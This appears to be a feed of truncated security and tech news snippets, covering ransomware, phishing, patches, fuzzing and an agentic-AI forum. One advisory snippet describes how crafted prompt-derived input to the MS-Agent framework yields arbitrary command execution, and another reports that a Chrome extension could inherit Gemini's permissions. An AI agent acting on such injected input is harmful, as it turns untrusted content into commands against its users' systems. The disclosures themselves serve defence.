CIO코리아와 한국IBM은 3월 5일 서울 그랜드 인터컨티넨탈 서울 파르나스에서 ‘에이전틱 AI 리더십 익스체인지(Agentic AI Leadership Exchange)’ 조찬 포럼을 개최했다. 제조·유통 산업의 CIO, CDO, AX·DX 리더들을 대상으로 열린 이번 행사에는 30여 명의 업계 관계자가 참석해 ‘무엇을 할 수 있는가’를 넘어 ‘어떻게 실제 성과로 연결할 것인가’를 핵심 화두로 에이전틱 AI 도입과 확산 전략을 논의했다. 행사에서는 EY 컨설팅의 이창호 파트너와 한국IBM 기술 리더 4인이 연사로 나서 에이전...

Starting in September, Google’s Chrome browser will receive a new release every two weeks, the company has announced . Since 2021, Chrome has been on a four-week release schedule for new major versions. The rationale for the faster two-week cycle is to enable faster delivery of performance improv...

Cupertino grabs an aging A18 Pro from parts bin to power its latest attempt at an entry-level MacBook You'll soon be able to get a MacBook that's cheaper than many budget PCs. Apple on Wednesday unveiled the MacBook Neo, a $599 exercise in cost cutting powered by the same silicon as an iPhone 16 ...

I was browsing on Reddit recently, as one does, and noticed yet another cynical comment dissing NordVPN . It compelled me to consider why exactly Nord in particular, and other popular VPNs in general, have this adverse public perception, and whether it’s actually fair. There is a trend in the onl...

So, you’ve received a suspicious link and would like to check whether the website is dangerous before visiting it. You can do this, for example, with the “URL Void” service from the security provider “No Virus Thanks.” To do this, go to www.urlvoid.com , enter the web address in question, and cli...

MDR (Managed Detection and Response) delivers focused protection at the endpoint level. MXDR (Managed Extended Detection and Response) broadens that visibility across networks, cloud environments, identities, email, and more. Choosing the Right Fit: MDR is well‑suited for smaller or less complex ...

Key operator in global ransomware scheme admits to role in multimillion-dollar extortion campaign.

Bing search results pointed victims to GitHub repositories claiming to host OpenClaw installers, but in reality they installed malware.

Overview The Rakuten Viber messaging app for Android V25.7.2.0g and Windows V25.6.0.0-V25.8.1.0, has a flaw in its TLS handshake implementation when using the Cloak proxy configuration. This flaw allows for easy identification of proxy usage, potentially compromising user anonymity. Description R...

Mutational grammar fuzzing is a fuzzing technique in which the fuzzer uses a predefined grammar that describes the structure of the samples. When a sample gets mutated, the mutations happen in such a way that any resulting samples still adhere to the grammar rules, thus the structure of the sampl...

[This is a Guest Diary by Joseph Gruen, an ISC intern as part of the SANS.edu BACS program]

If you run an accounting firm, tax practice, bookkeeping service, mortgage brokerage, financial advisory office, or small insurance agency, your business runs on trust. You handle tax returns, payroll data, bank details, loan applications, investment accounts, and insurance policies. That makes y...

Researchers have found that attackers are abusing OAuth to send users from legitimate Microsoft or Google login pages to phishing sites or malware downloads.

Google has patched 129 Android vulnerabilities, including an actively exploited flaw in a widely used Qualcomm component.

CrushFTP is a Java-based open source file transfer system. It is offered for multiple operating systems. If you run a CrushFTP instance, you may remember that the software has had some serious vulnerabilities: CVE-2024-4040 (the template-injection flaw that let unauthenticated attackers escape th...

Too many organizations today still rely on "legacy" retainer models. These traditional contracts are often rigid, opaque, and reactive, and designed for a world that no longer exists.

Researchers found a now-patched vulnerability in "Live in Chrome" that allowed a Chrome extension to inherit Gemini’s permissions.

Cisco Talos continues to monitor the ongoing conflict in the Middle East. As always, we will be watching closely for any cyber-related incidents that are tied to the conflict.

Easy File Sharing Web Server v7.2 - Buffer Overflow

WeGIA 3.5.0 - SQL Injection

Boss Mini v1.4.0 - Local File Inclusion (LFI)

Overview A command injection vulnerability was identified in the MS-Agent framework that can be triggered through unsanitized prompt-derived input. An attacker can craft untrusted input introduced via a chat prompt or other external content sources, resulting in arbitrary command execution on the...

Torrance, United States / California, 2nd March 2026, CyberNewswire The post Criminal IP to Present Decision-Ready Threat Intelligence at RSAC™ 2026 appeared first on The Security Ledger with Paul F. Roberts .

Frankfurt am Main, Germany, 2nd March 2026, CyberNewswire The post Link11 Releases European Cyber Report 2026: DDoS Attacks Become a Constant Threat appeared first on The Security Ledger with Paul F. Roberts .

A fake purchase order attachment turned out to be a phishing page designed to harvest your login details.